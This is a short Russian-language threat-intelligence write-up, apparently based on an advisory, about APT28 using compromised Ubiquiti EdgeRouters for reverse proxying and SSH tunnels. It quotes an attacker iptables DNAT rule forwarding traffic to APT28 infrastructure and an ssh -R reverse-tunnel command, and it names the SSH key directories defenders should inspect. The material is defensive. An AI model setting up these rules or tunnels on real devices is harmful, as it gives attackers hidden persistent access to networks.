Прокси и туннель. Неофициальные функции Ubiquiti

Прокси-сервер ‎и‏ ‎туннельная ‎инфраструктура

APT28 ‎использовали ‎скомпрометированные ‎Ubiquiti‏ ‎EdgeRouters ‎для‏ ‎установления‏ ‎прокси-соединений ‎и ‎SSH-туннелей‏ ‎к ‎подконтрольной‏ ‎инфраструктуре ‎для ‎поддержания ‎постоянного‏ ‎доступа‏ ‎и ‎контроля‏ ‎над ‎скомпрометированными‏ ‎устройствами ‎даже ‎после ‎смены ‎пароля‏ ‎или‏ ‎других ‎попыток‏ ‎взлома.

Reverse ‎proxy-подключения

Были‏ ‎использованы ‎правила ‎iptables ‎в ‎EdgeRouters‏ ‎для‏ ‎установления‏ ‎подключений, ‎например:

iptables‏ ‎-t ‎nat‏ ‎-I ‎PREROUTING‏ ‎-d‏ ‎<router ‎IP‏ ‎address> ‎-p ‎tcp ‎-m ‎tcp‏ ‎--dport ‎4443‏ ‎-j‏ ‎DNAT ‎-to-destination ‎<APT28‏ ‎dedicated ‎infrastructure>:‏ ‎10081

Это ‎правило ‎iptables ‎перенаправляет‏ ‎входящий‏ ‎трафик ‎через‏ ‎порт ‎4443‏ ‎EdgeRouter ‎в ‎выделенную ‎инфраструктуру ‎на‏ ‎порту‏ ‎10081.

Reverse ‎SSH-туннели

Кроме‏ ‎того, ‎APT28‏ ‎загрузили ‎контролируемые ‎SSH-RSA-ключи ‎на ‎скомпрометированные‏ ‎EdgeRouters‏ ‎для‏ ‎создания ‎SSH-туннелей.‏ ‎Эти ‎туннели‏ ‎позволяют ‎получать‏ ‎доступ‏ ‎к ‎скомпрометированным‏ ‎устройствам ‎даже ‎после ‎смены ‎пароля‏ ‎или ‎других‏ ‎попыток‏ ‎взлома.

Следующие ‎каталоги ‎необходимо‏ ‎просмотреть ‎на‏ ‎предмет ‎неизвестных ‎ключей ‎RSA:

/root/.ssh/

/home/<user>/.ssh/

Наличие‏ ‎неизвестных‏ ‎ключей ‎RSA‏ ‎в ‎этих‏ ‎каталогах ‎может ‎указывать ‎на ‎то,‏ ‎что‏ ‎их ‎использовали‏ ‎для ‎доступа‏ ‎к ‎EdgeRouters ‎в ‎обход ‎аутентификации‏ ‎по‏ ‎паролю.

Кроме‏ ‎того, ‎безопасники‏ ‎могут ‎проверить‏ ‎журналы ‎сетевого‏ ‎трафика‏ ‎на ‎EdgeRouters‏ ‎для ‎идентификации ‎аномальные ‎сеансы ‎SSH:

ssh‏ ‎–i ‎<RSA‏ ‎key>‏ ‎-p ‎<port> ‎root@<router‏ ‎IP ‎address>‏ ‎-R ‎<router ‎IP ‎address>:<port>

Эта‏ ‎команда‏ ‎устанавливает ‎SSH-туннель‏ ‎от ‎EdgeRouter‏ ‎к ‎инфраструктуре, ‎позволяя ‎поддерживать ‎удалённый‏ ‎доступ‏ ‎и ‎контроль‏ ‎над ‎скомпрометированным‏ ‎устройством.